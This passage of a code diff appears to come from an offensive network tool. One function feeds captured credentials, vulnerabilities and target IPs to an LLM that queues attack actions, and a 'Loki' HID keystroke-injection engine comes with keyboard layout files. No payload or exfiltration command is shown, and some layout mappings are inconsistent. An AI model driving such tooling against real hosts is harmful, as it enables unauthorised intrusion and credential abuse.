                    "hostname": (r.get("hostnames") or "").split(";")[0].strip(),
                    "vendor": r.get("vendor", ""),
                    "ports": r.get("ports", ""),
                })
        except Exception:
            pass

        # ── Port services (identified services with product/version) ──
        try:
            rows = self._sd.db.query(
                "SELECT mac_address, ip, port, service, product, version "
                "FROM port_services WHERE is_current=1 AND state='open' "
                "ORDER BY mac_address, port LIMIT 100"
            )
            for r in (rows or []):
                svc = {"mac": r.get("mac_address", ""), "port": r.get("port")}
                if r.get("ip"):
                    svc["ip"] = r["ip"]
                if r.get("service"):
                    svc["service"] = r["service"]
                if r.get("product"):
                    svc["product"] = r["product"]
                if r.get("version"):
                    svc["version"] = r["version"]
                services.append(svc)
        except Exception:
            pass

        # ── Active vulnerabilities ──
        try:
            rows = self._sd.db.query(
                "SELECT ip, port, vuln_id, hostname "
                "FROM vulnerabilities WHERE is_active=1 LIMIT 30"
            )
            vulns = [{"ip": r.get("ip", ""), "port": r.get("port"),
                      "vuln_id": r.get("vuln_id", ""),
                      "hostname": r.get("hostname", "")}
                     for r in (rows or [])]
        except Exception:
            pass

        # ── Captured credentials ──
        try:
            rows = self._sd.db.query(
                "SELECT service, ip, hostname, port, \"user\" "
                "FROM creds LIMIT 30"
            )
            creds = [{"service": r.get("service", ""), "ip": r.get("ip", ""),
                      "hostname": r.get("hostname", ""), "port": r.get("port"),
                      "user": r.get("user", "")}
                     for r in (rows or [])]
        except Exception:
            pass

        # ── Available actions catalog (what the LLM can queue) ──
        allowed = self._allowed_actions()
        try:
            if allowed:
                placeholders = ",".join("?" * len(allowed))
                rows = self._sd.db.query(
                    f"SELECT b_class, b_description, b_port, b_service "
                    f"FROM actions WHERE b_class IN ({placeholders}) AND b_enabled=1",
                    tuple(allowed)
                )
                for r in (rows or []):
                    entry = {"name": r["b_class"]}
                    if r.get("b_description"):
                        entry["description"] = r["b_description"][:100]
                    if r.get("b_port"):
                        entry["target_port"] = r["b_port"]
                    if r.get("b_service"):
                        entry["target_service"] = r["b_service"]
                    actions_catalog.append(entry)
        except Exception:
            pass

        # ── Pending queue ──
        try:
            rows = self._sd.db.query(
                "SELECT action_name, ip, priority FROM action_queue "
                "WHERE status='pending' ORDER BY priority DESC LIMIT 15"
            )
            pending = [{"action": r["action_name"], "ip": r["ip"]} for r in (rows or [])]
        except Exception:
            pass

        # ── Recent action history ──
        try:
            rows = self._sd.db.query(
                "SELECT action_name, ip, status FROM action_queue "
                "WHERE status IN ('success','failed') ORDER BY completed_at DESC LIMIT 15"
            )
            history = [{"action": r["action_name"], "ip": r["ip"], "result": r["status"]}
                       for r in (rows or [])]
        except Exception:
            pass

        # Build explicit IP list for emphasis
        ip_list = [h["ip"] for h in hosts if h.get("ip")]

        result = {
            "VALID_TARGET_IPS": ip_list,
            "hosts_alive": hosts,
            "operation_mode": getattr(self._sd, "operation_mode", "?"),
        }
        if services:
            result["services_detected"] = services
        if vulns:
            result["vulnerabilities_found"] = vulns
        if creds:
            result["credentials_captured"] = creds
        if actions_catalog:
            result["available_actions"] = actions_catalog
        result["pending_queue"] = pending
        result["recent_actions"] = history
        result["summary"] = {
            "hosts_alive": len(ip_list),
            "vulns": getattr(self._sd, "vuln_count", 0),
            "creds": getattr(self._sd, "cred_count", 0),
        }

        return result
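    # Example snapshot shape (values illustrative):
    #   {"VALID_TARGET_IPS": ["192.168.1.23"],
    #    "hosts_alive": [{"ip": "192.168.1.23", "mac": "aa:bb:cc:dd:ee:ff",
    #                     "hostname": "nas", "vendor": "Synology", "ports": "22;80"}],
    #    "operation_mode": "AUTO",
    #    "pending_queue": [], "recent_actions": [],
    #    "summary": {"hosts_alive": 1, "vulns": 0, "creds": 0}}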
@@ -1,4 +1,5 @@
# logger.py
"""logger.py - Rotating file + console logger with custom SUCCESS level."""

import logging
import os
import threading

@@ -1,21 +1,6 @@
"""
Loki — HID Attack Engine for Bjorn.
"""__init__.py - Loki HID attack engine for Bjorn.

Manages USB HID gadget lifecycle, script execution, and job tracking.
Named after the Norse trickster god.

Loki is the 5th exclusive operation mode (alongside MANUAL, AUTO, AI, BIFROST).
When active, the orchestrator stops and the Pi acts as a keyboard/mouse
to the connected host via /dev/hidg0 (keyboard) and /dev/hidg1 (mouse).

HID GADGET STRATEGY:
The HID functions (keyboard + mouse) are created ONCE at boot time alongside
RNDIS networking by the usb-gadget.sh script. This avoids the impossible task
of hot-adding HID functions to a running composite gadget (UDC rebind fails
with EIO when RNDIS is active).

LokiEngine simply opens/closes the /dev/hidg0 and /dev/hidg1 device files.
If /dev/hidg0 doesn't exist, the user needs to run the setup once and reboot.
Manages USB HID gadget lifecycle, HIDScript execution, and job tracking.
"""
import os
import time
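# Minimal sketch of what "acting as a keyboard" means at the device level
# (standard 8-byte boot-keyboard report: [modifiers, reserved, key1..key6];
# illustration only, not LokiEngine's API):
#
#   with open("/dev/hidg0", "wb") as kb:
#       kb.write(bytes([0x02, 0, 0x04, 0, 0, 0, 0, 0]))  # Shift + 'a' -> 'A'
#       kb.write(bytes(8))                                # all-zero report = release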
@@ -27,7 +12,7 @@ from logger import Logger

logger = Logger(name="loki", level=logging.DEBUG)

# USB HID report descriptors — EXACT byte-for-byte copies from P4wnP1_aloa
# USB HID report descriptors - EXACT byte-for-byte copies from P4wnP1_aloa
# Source: P4wnP1_aloa-master/service/SubSysUSB.go lines 54-70
#
# These are written to the gadget at boot time by usb-gadget.sh.
@@ -64,7 +49,7 @@ _MOUSE_REPORT_DESC = bytes([
# The boot script that creates RNDIS + HID functions at startup.
# This replaces /usr/local/bin/usb-gadget.sh
_USB_GADGET_SCRIPT = '''#!/bin/bash
# usb-gadget.sh — USB composite gadget: RNDIS networking + HID (keyboard/mouse)
# usb-gadget.sh - USB composite gadget: RNDIS networking + HID (keyboard/mouse)
# Auto-generated by Bjorn Loki. Do not edit manually.

modprobe libcomposite

@@ -196,7 +181,7 @@ _GADGET_SCRIPT_PATH = "/usr/local/bin/usb-gadget.sh"


class LokiEngine:
    """HID attack engine — manages script execution and job tracking.
    """HID attack engine - manages script execution and job tracking.

    The USB HID gadget (keyboard + mouse) is set up at boot time by
    usb-gadget.sh. This engine simply opens /dev/hidg0 and /dev/hidg1.
@@ -242,7 +227,7 @@ class LokiEngine:
        # Check if HID gadget is available (set up at boot)
        if not os.path.exists("/dev/hidg0"):
            logger.error(
                "/dev/hidg0 not found — HID gadget not configured at boot. "
                "/dev/hidg0 not found - HID gadget not configured at boot. "
                "Run install_hid_gadget() from the Loki API and reboot."
            )
            self._gadget_ready = False
@@ -287,7 +272,7 @@ class LokiEngine:
        if job["status"] == "running":
            self._jobs.cancel_job(job["id"])

        # Close HID devices (don't remove gadget — it persists)
        # Close HID devices (don't remove gadget - it persists)
        if self._hid:
            self._hid.close()

@@ -1,5 +1,5 @@
"""
Low-level USB HID controller for Loki.
"""hid_controller.py - Low-level USB HID controller for Loki.

Writes keyboard and mouse reports to /dev/hidg0 and /dev/hidg1.
"""
import os
@@ -16,7 +16,7 @@ from loki.layouts import load as load_layout
logger = Logger(name="loki.hid_controller", level=logging.DEBUG)

# ── HID Keycodes ──────────────────────────────────────────────
# USB HID Usage Tables — Keyboard/Keypad Page (0x07)
# USB HID Usage Tables - Keyboard/Keypad Page (0x07)

KEY_NONE = 0x00
KEY_A = 0x04

@@ -1,17 +1,6 @@
"""
HIDScript parser and executor for Loki.
"""hidscript.py - P4wnP1-compatible HIDScript parser and executor.

Supports P4wnP1-compatible HIDScript syntax:
  - Function calls: type("hello"); press("GUI r"); delay(500);
  - var declarations: var x = 1;
  - for / while loops
  - if / else conditionals
  - // and /* */ comments
  - String concatenation with +
  - Basic arithmetic (+, -, *, /)
  - console.log() for job output

Zero external dependencies — pure Python DSL parser.
Pure Python DSL parser supporting type/press/delay, loops, conditionals, and variables.
"""
import re
import time
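# A short HIDScript in the syntax listed above (illustrative; exact loop
# grammar is the parser's, this only combines documented constructs):
#   var greet = "Hello " + "world";
#   press("GUI r");
#   delay(500);
#   type(greet);
#   console.log("typed: " + greet);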
@@ -240,7 +229,7 @@ class HIDScriptParser:
                else_body = source[after_else+1:eb_end]
                next_pos = eb_end + 1
            elif source[after_else:after_else+2] == 'if':
                # else if — parse recursively
                # else if - parse recursively
                inner_if, next_pos = self._parse_if(source, after_else)
                else_body = inner_if  # will be a dict, handle in exec
            else:

@@ -1,5 +1,5 @@
"""
Loki job manager — tracks HIDScript execution jobs.
"""jobs.py - Loki job manager, tracks HIDScript execution jobs.

Each job runs in its own daemon thread.
"""
import uuid

@@ -1,5 +1,5 @@
"""
Keyboard layout loader for Loki HID subsystem.
"""__init__.py - Keyboard layout loader for Loki HID subsystem.

Caches loaded layouts in memory.
"""
import json

422
loki/layouts/de.json
Normal file
@@ -0,0 +1,422 @@
{
    "a": [0, 4], "b": [0, 5], "c": [0, 6], "d": [0, 7], "e": [0, 8],
    "f": [0, 9], "g": [0, 10], "h": [0, 11], "i": [0, 12], "j": [0, 13],
    "k": [0, 14], "l": [0, 15], "m": [0, 16], "n": [0, 17], "o": [0, 18],
    "p": [0, 19], "q": [0, 20], "r": [0, 21], "s": [0, 22], "t": [0, 23],
    "u": [0, 24], "v": [0, 25], "w": [0, 26], "x": [0, 27], "y": [0, 29],
    "z": [0, 28],
    "A": [2, 4], "B": [2, 5], "C": [2, 6], "D": [2, 7], "E": [2, 8],
    "F": [2, 9], "G": [2, 10], "H": [2, 11], "I": [2, 12], "J": [2, 13],
    "K": [2, 14], "L": [2, 15], "M": [2, 16], "N": [2, 17], "O": [2, 18],
    "P": [2, 19], "Q": [2, 20], "R": [2, 21], "S": [2, 22], "T": [2, 23],
    "U": [2, 24], "V": [2, 25], "W": [2, 26], "X": [2, 27], "Y": [2, 29],
    "Z": [2, 28],
    "1": [0, 30], "2": [0, 31], "3": [0, 32], "4": [0, 33], "5": [0, 34],
    "6": [0, 35], "7": [0, 36], "8": [0, 37], "9": [0, 38], "0": [0, 39],
    "!": [2, 30], "@": [2, 31], "#": [0, 49], "$": [2, 33], "%": [2, 34],
    "^": [2, 35], "&": [2, 35], "*": [2, 48], "(": [2, 37], ")": [2, 38],
    "\n": [0, 40], "\r": [0, 40], "\t": [0, 43], " ": [0, 44],
    "-": [0, 45], "_": [2, 45], "=": [2, 39], "+": [0, 48],
    "[": [0, 47], "{": [2, 47], "]": [0, 48], "}": [2, 48],
    "\\": [0, 49], "|": [2, 49], ";": [0, 51], ":": [2, 51],
    "'": [2, 49], "\"": [2, 52], "`": [0, 53], "~": [2, 53],
    ",": [0, 54], "<": [0, 100], ".": [0, 55], ">": [2, 100],
    "/": [2, 36], "?": [2, 45],
    "ß": [0, 45], "ü": [0, 47], "Ü": [2, 47], "ö": [0, 51], "Ö": [2, 51],
    "ä": [0, 52], "Ä": [2, 52]
}
426
loki/layouts/es.json
Normal file
@@ -0,0 +1,426 @@
{
    "a": [0, 4], "b": [0, 5], "c": [0, 6], "d": [0, 7], "e": [0, 8],
    "f": [0, 9], "g": [0, 10], "h": [0, 11], "i": [0, 12], "j": [0, 13],
    "k": [0, 14], "l": [0, 15], "m": [0, 16], "n": [0, 17], "o": [0, 18],
    "p": [0, 19], "q": [0, 20], "r": [0, 21], "s": [0, 22], "t": [0, 23],
    "u": [0, 24], "v": [0, 25], "w": [0, 26], "x": [0, 27], "y": [0, 28],
    "z": [0, 29],
    "A": [2, 4], "B": [2, 5], "C": [2, 6], "D": [2, 7], "E": [2, 8],
    "F": [2, 9], "G": [2, 10], "H": [2, 11], "I": [2, 12], "J": [2, 13],
    "K": [2, 14], "L": [2, 15], "M": [2, 16], "N": [2, 17], "O": [2, 18],
    "P": [2, 19], "Q": [2, 20], "R": [2, 21], "S": [2, 22], "T": [2, 23],
    "U": [2, 24], "V": [2, 25], "W": [2, 26], "X": [2, 27], "Y": [2, 28],
    "Z": [2, 29],
    "1": [0, 30], "2": [0, 31], "3": [0, 32], "4": [0, 33], "5": [0, 34],
    "6": [0, 35], "7": [0, 36], "8": [0, 37], "9": [0, 38], "0": [0, 39],
    "!": [2, 30], "@": [2, 31], "#": [2, 32], "$": [2, 33], "%": [2, 34],
    "^": [2, 35], "&": [2, 36], "*": [2, 48], "(": [2, 38], ")": [2, 39],
    "\n": [0, 40], "\r": [0, 40], "\t": [0, 43], " ": [0, 44],
    "-": [0, 56], "_": [2, 56], "=": [0, 46], "+": [0, 48],
    "[": [0, 47], "{": [2, 47], "]": [0, 48], "}": [2, 48],
    "\\": [0, 49], "|": [2, 49], ";": [0, 51], ":": [2, 51],
    "'": [0, 45], "\"": [2, 52], "`": [0, 53], "~": [2, 53],
    ",": [0, 54], "<": [0, 100], ".": [0, 55], ">": [2, 100],
    "/": [0, 56], "?": [2, 45],
    "ñ": [0, 51], "Ñ": [2, 51], "ç": [0, 49], "Ç": [2, 49],
    "¡": [0, 46], "¿": [2, 46], "´": [0, 47], "¨": [2, 47]
}
446
loki/layouts/fr.json
Normal file
@@ -0,0 +1,446 @@
{
    "a": [0, 20], "b": [0, 5], "c": [0, 6], "d": [0, 7], "e": [0, 8],
    "f": [0, 9], "g": [0, 10], "h": [0, 11], "i": [0, 12], "j": [0, 13],
    "k": [0, 14], "l": [0, 15], "m": [0, 51], "n": [0, 17], "o": [0, 18],
    "p": [0, 19], "q": [0, 4], "r": [0, 21], "s": [0, 22], "t": [0, 23],
    "u": [0, 24], "v": [0, 25], "w": [0, 29], "x": [0, 27], "y": [0, 28],
    "z": [0, 26],
    "A": [2, 20], "B": [2, 5], "C": [2, 6], "D": [2, 7], "E": [2, 8],
    "F": [2, 9], "G": [2, 10], "H": [2, 11], "I": [2, 12], "J": [2, 13],
    "K": [2, 14], "L": [2, 15], "M": [2, 51], "N": [2, 17], "O": [2, 18],
    "P": [2, 19], "Q": [2, 4], "R": [2, 21], "S": [2, 22], "T": [2, 23],
    "U": [2, 24], "V": [2, 25], "W": [2, 29], "X": [2, 27], "Y": [2, 28],
    "Z": [2, 26],
    "1": [2, 30], "2": [2, 31], "3": [2, 32], "4": [2, 33], "5": [2, 34],
    "6": [2, 35], "7": [2, 36], "8": [2, 37], "9": [2, 38], "0": [2, 39],
    "!": [0, 56], "@": [64, 39], "#": [64, 32], "$": [0, 48], "%": [2, 52],
    "^": [0, 47], "&": [0, 30], "*": [0, 49], "(": [0, 34], ")": [0, 45],
    "\n": [0, 40], "\r": [0, 40], "\t": [0, 43], " ": [0, 44],
    "-": [0, 35], "_": [0, 37], "=": [0, 46], "+": [2, 46],
    "[": [64, 34], "{": [64, 33], "]": [64, 45], "}": [64, 46],
    "\\": [64, 37], "|": [64, 35], ";": [0, 54], ":": [0, 55],
    "'": [0, 33], "\"": [0, 32], "`": [64, 36], "~": [64, 31],
    ",": [0, 16], "<": [0, 100], ".": [2, 54], ">": [2, 100],
    "/": [2, 55], "?": [2, 16],
    "é": [0, 31], "è": [0, 36], "ç": [0, 38], "à": [0, 39],
    "§": [2, 56], "€": [64, 8], "°": [2, 45], "¨": [2, 47],
    "£": [2, 48], "¤": [64, 48], "µ": [2, 49], "ù": [0, 52], "²": [0, 53]
}
78
loki/layouts/generate_layouts.py
Normal file
@@ -0,0 +1,78 @@
"""generate_layouts.py - Generates localized keyboard layout JSON files from a US base layout."""

import json
import os

# Load the US base layout
with open("us.json", "r") as f:
    US_BASE = json.load(f)

# Key differences from the US layout
# 0 = Normal, 2 = Shift, 64 = AltGr (Right Alt)
LAYOUT_DIFFS = {
    "fr": {
        "a": [0, 20], "A": [2, 20], "q": [0, 4], "Q": [2, 4],
        "z": [0, 26], "Z": [2, 26], "w": [0, 29], "W": [2, 29],
        "m": [0, 51], "M": [2, 51],
        "1": [2, 30], "2": [2, 31], "3": [2, 32], "4": [2, 33], "5": [2, 34],
        "6": [2, 35], "7": [2, 36], "8": [2, 37], "9": [2, 38], "0": [2, 39],
        "&": [0, 30], "é": [0, 31], "\"": [0, 32], "'": [0, 33], "(": [0, 34],
        "-": [0, 35], "è": [0, 36], "_": [0, 37], "ç": [0, 38], "à": [0, 39],
        "~": [64, 31], "#": [64, 32], "{": [64, 33], "[": [64, 34], "|": [64, 35],
        "`": [64, 36], "\\": [64, 37], "^": [0, 47], "@": [64, 39], "]": [64, 45],
        "}": [64, 46], "!": [0, 56], "§": [2, 56], "€": [64, 8], ")": [0, 45],
        "°": [2, 45], "=": [0, 46], "+": [2, 46], "¨": [2, 47], "$": [0, 48],
        "£": [2, 48], "¤": [64, 48], "*": [0, 49], "µ": [2, 49], "ù": [0, 52],
        "%": [2, 52], "²": [0, 53], ",": [0, 16], "?": [2, 16], ";": [0, 54],
        ".": [2, 54], ":": [0, 55], "/": [2, 55], "<": [0, 100], ">": [2, 100]
    },
    "uk": {
        "\"": [2, 31], "@": [2, 52], "£": [2, 32], "~": [0, 50],
        "#": [0, 49], "\\": [0, 100], "|": [2, 100]
    },
    "de": {
        "y": [0, 29], "Y": [2, 29], "z": [0, 28], "Z": [2, 28],
        "ß": [0, 45], "?": [2, 45], "ü": [0, 47], "Ü": [2, 47],
        "+": [0, 48], "*": [2, 48], "ö": [0, 51], "Ö": [2, 51],
        "ä": [0, 52], "Ä": [2, 52], "#": [0, 49], "'": [2, 49],
        "&": [2, 35], "/": [2, 36], "(": [2, 37], ")": [2, 38],
        "=": [2, 39], "<": [0, 100], ">": [2, 100]
    },
    "es": {
        "ñ": [0, 51], "Ñ": [2, 51], "ç": [0, 49], "Ç": [2, 49],
        "'": [0, 45], "?": [2, 45], "¡": [0, 46], "¿": [2, 46],
        "´": [0, 47], "¨": [2, 47], "+": [0, 48], "*": [2, 48],
        "<": [0, 100], ">": [2, 100], "-": [0, 56], "_": [2, 56]
    },
    "it": {
        "ò": [0, 51], "ç": [2, 51], "à": [0, 52], "°": [2, 52],
        "ù": [0, 49], "§": [2, 49], "è": [0, 47], "é": [2, 47],
        "ì": [0, 46], "^": [2, 46], "'": [0, 45], "?": [2, 45],
        "+": [0, 48], "*": [2, 48], "<": [0, 100], ">": [2, 100],
        "-": [0, 56], "_": [2, 56]
    },
    "ru": {
        "й": [0, 20], "ц": [0, 26], "у": [0, 8], "к": [0, 21], "е": [0, 23],
        "н": [0, 28], "г": [0, 24], "ш": [0, 12], "щ": [0, 18], "з": [0, 19],
        "х": [0, 47], "ъ": [0, 48], "ф": [0, 4], "ы": [0, 22], "в": [0, 7],
        "а": [0, 4], "п": [0, 10], "р": [0, 11], "о": [0, 13], "л": [0, 14],
        "д": [0, 15], "ж": [0, 51], "э": [0, 52], "я": [0, 29], "ч": [0, 27],
        "с": [0, 6], "м": [0, 25], "и": [0, 5], "т": [0, 17], "ь": [0, 16],
        "б": [0, 54], "ю": [0, 55], "ё": [0, 53], ".": [0, 56], ",": [2, 56],
        "№": [2, 32], ";": [2, 33], ":": [2, 35], "?": [2, 36]
    },
    "zh": {}  # ZH uses the exact US layout
}

def generate_layouts():
    for lang, diff in LAYOUT_DIFFS.items():
        new_layout = dict(US_BASE)
        new_layout.update(diff)

        filename = f"{lang}.json"
        with open(filename, "w", encoding="utf-8") as f:
            json.dump(new_layout, f, indent=4, ensure_ascii=False)
        print(f"Generated: {filename} ({len(new_layout)} keys)")

if __name__ == "__main__":
    generate_layouts()
|
||||
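These [modifier, keycode] pairs are shaped so that an HID keystroke injector can turn every character into an 8-byte boot-keyboard report (byte 0 = modifiers, byte 1 = reserved, bytes 2-7 = keycodes). A minimal sketch of that consumption path, assuming a Linux USB gadget keyboard exposed at /dev/hidg0; the device path and function names are our assumptions, not code from this commit:

    import json

    def char_to_reports(char, layout):
        """Build the 8-byte press and release reports for one character."""
        modifier, keycode = layout[char]
        press = bytes([modifier, 0, keycode, 0, 0, 0, 0, 0])
        release = bytes(8)  # all zeros = every key released
        return press, release

    def type_string(text, layout_path="fr.json", device="/dev/hidg0"):
        with open(layout_path, encoding="utf-8") as f:
            layout = json.load(f)
        with open(device, "wb", buffering=0) as hid:
            for char in text:
                press, release = char_to_reports(char, layout)
                hid.write(press)
                hid.write(release)

Each press report must be followed by an all-zero release report; otherwise the host treats the key as held down and auto-repeats it.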
430 loki/layouts/it.json Normal file
@@ -0,0 +1,430 @@
{
    "a": [0, 4],
    "b": [0, 5],
    "c": [0, 6],
    "d": [0, 7],
    "e": [0, 8],
    "f": [0, 9],
    "g": [0, 10],
    "h": [0, 11],
    "i": [0, 12],
    "j": [0, 13],
    "k": [0, 14],
    "l": [0, 15],
    "m": [0, 16],
    "n": [0, 17],
    "o": [0, 18],
    "p": [0, 19],
    "q": [0, 20],
    "r": [0, 21],
    "s": [0, 22],
    "t": [0, 23],
    "u": [0, 24],
    "v": [0, 25],
    "w": [0, 26],
    "x": [0, 27],
    "y": [0, 28],
    "z": [0, 29],
    "A": [2, 4],
    "B": [2, 5],
    "C": [2, 6],
    "D": [2, 7],
    "E": [2, 8],
    "F": [2, 9],
    "G": [2, 10],
    "H": [2, 11],
    "I": [2, 12],
    "J": [2, 13],
    "K": [2, 14],
    "L": [2, 15],
    "M": [2, 16],
    "N": [2, 17],
    "O": [2, 18],
    "P": [2, 19],
    "Q": [2, 20],
    "R": [2, 21],
    "S": [2, 22],
    "T": [2, 23],
    "U": [2, 24],
    "V": [2, 25],
    "W": [2, 26],
    "X": [2, 27],
    "Y": [2, 28],
    "Z": [2, 29],
    "1": [0, 30],
    "2": [0, 31],
    "3": [0, 32],
    "4": [0, 33],
    "5": [0, 34],
    "6": [0, 35],
    "7": [0, 36],
    "8": [0, 37],
    "9": [0, 38],
    "0": [0, 39],
    "!": [2, 30],
    "@": [2, 31],
    "#": [2, 32],
    "$": [2, 33],
    "%": [2, 34],
    "^": [2, 46],
    "&": [2, 36],
    "*": [2, 48],
    "(": [2, 38],
    ")": [2, 39],
    "\n": [0, 40],
    "\r": [0, 40],
    "\t": [0, 43],
    " ": [0, 44],
    "-": [0, 56],
    "_": [2, 56],
    "=": [0, 46],
    "+": [0, 48],
    "[": [0, 47],
    "{": [2, 47],
    "]": [0, 48],
    "}": [2, 48],
    "\\": [0, 49],
    "|": [2, 49],
    ";": [0, 51],
    ":": [2, 51],
    "'": [0, 45],
    "\"": [2, 52],
    "`": [0, 53],
    "~": [2, 53],
    ",": [0, 54],
    "<": [0, 100],
    ".": [0, 55],
    ">": [2, 100],
    "/": [0, 56],
    "?": [2, 45],
    "ò": [0, 51],
    "ç": [2, 51],
    "à": [0, 52],
    "°": [2, 52],
    "ù": [0, 49],
    "§": [2, 49],
    "è": [0, 47],
    "é": [2, 47],
    "ì": [0, 46]
}
530 loki/layouts/ru.json Normal file
@@ -0,0 +1,530 @@
{
    "a": [0, 4],
    "b": [0, 5],
    "c": [0, 6],
    "d": [0, 7],
    "e": [0, 8],
    "f": [0, 9],
    "g": [0, 10],
    "h": [0, 11],
    "i": [0, 12],
    "j": [0, 13],
    "k": [0, 14],
    "l": [0, 15],
    "m": [0, 16],
    "n": [0, 17],
    "o": [0, 18],
    "p": [0, 19],
    "q": [0, 20],
    "r": [0, 21],
    "s": [0, 22],
    "t": [0, 23],
    "u": [0, 24],
    "v": [0, 25],
    "w": [0, 26],
    "x": [0, 27],
    "y": [0, 28],
    "z": [0, 29],
    "A": [2, 4],
    "B": [2, 5],
    "C": [2, 6],
    "D": [2, 7],
    "E": [2, 8],
    "F": [2, 9],
    "G": [2, 10],
    "H": [2, 11],
    "I": [2, 12],
    "J": [2, 13],
    "K": [2, 14],
    "L": [2, 15],
    "M": [2, 16],
    "N": [2, 17],
    "O": [2, 18],
    "P": [2, 19],
    "Q": [2, 20],
    "R": [2, 21],
    "S": [2, 22],
    "T": [2, 23],
    "U": [2, 24],
    "V": [2, 25],
    "W": [2, 26],
    "X": [2, 27],
    "Y": [2, 28],
    "Z": [2, 29],
    "1": [0, 30],
    "2": [0, 31],
    "3": [0, 32],
    "4": [0, 33],
    "5": [0, 34],
    "6": [0, 35],
    "7": [0, 36],
    "8": [0, 37],
    "9": [0, 38],
    "0": [0, 39],
    "!": [2, 30],
    "@": [2, 31],
    "#": [2, 32],
    "$": [2, 33],
    "%": [2, 34],
    "^": [2, 35],
    "&": [2, 36],
    "*": [2, 37],
    "(": [2, 38],
    ")": [2, 39],
    "\n": [0, 40],
    "\r": [0, 40],
    "\t": [0, 43],
    " ": [0, 44],
    "-": [0, 45],
    "_": [2, 45],
    "=": [0, 46],
    "+": [2, 46],
    "[": [0, 47],
    "{": [2, 47],
    "]": [0, 48],
    "}": [2, 48],
    "\\": [0, 49],
    "|": [2, 49],
    ";": [2, 33],
    ":": [2, 35],
    "'": [0, 52],
    "\"": [2, 52],
    "`": [0, 53],
    "~": [2, 53],
    ",": [2, 56],
    "<": [2, 54],
    ".": [0, 56],
    ">": [2, 55],
    "/": [0, 56],
    "?": [2, 36],
    "й": [0, 20],
    "ц": [0, 26],
    "у": [0, 8],
    "к": [0, 21],
    "е": [0, 23],
    "н": [0, 28],
    "г": [0, 24],
    "ш": [0, 12],
    "щ": [0, 18],
    "з": [0, 19],
    "х": [0, 47],
    "ъ": [0, 48],
    "ф": [0, 4],
    "ы": [0, 22],
    "в": [0, 7],
    "а": [0, 9],
    "п": [0, 10],
    "р": [0, 11],
    "о": [0, 13],
    "л": [0, 14],
    "д": [0, 15],
    "ж": [0, 51],
    "э": [0, 52],
    "я": [0, 29],
    "ч": [0, 27],
    "с": [0, 6],
    "м": [0, 25],
    "и": [0, 5],
    "т": [0, 17],
    "ь": [0, 16],
    "б": [0, 54],
    "ю": [0, 55],
    "ё": [0, 53],
    "№": [2, 32]
}
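Because each localized file is just the US base overwritten with a per-language diff, two characters can silently end up on the same chord; in it.json above, ";" and "ò" both resolve to [0, 51], so typing ";" on the Italian layout would actually produce "ò". Some sharing is intentional ("\n" and "\r" both map to Enter), but unexpected collisions are worth flagging. A small consistency check, offered as an illustrative sketch rather than repo code:

    import json
    import sys
    from collections import defaultdict

    # Report every chord (modifier, keycode) claimed by more than one character.
    def find_collisions(path):
        with open(path, encoding="utf-8") as f:
            layout = json.load(f)
        by_chord = defaultdict(list)
        for char, (modifier, keycode) in layout.items():
            by_chord[(modifier, keycode)].append(char)
        return {chord: chars for chord, chars in by_chord.items() if len(chars) > 1}

    if __name__ == "__main__":
        for path in sys.argv[1:]:  # e.g. python check_layouts.py *.json
            for chord, chars in sorted(find_collisions(path).items()):
                print(f"{path}: {chord} shared by {chars}")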
Some files were not shown because too many files have changed in this diff.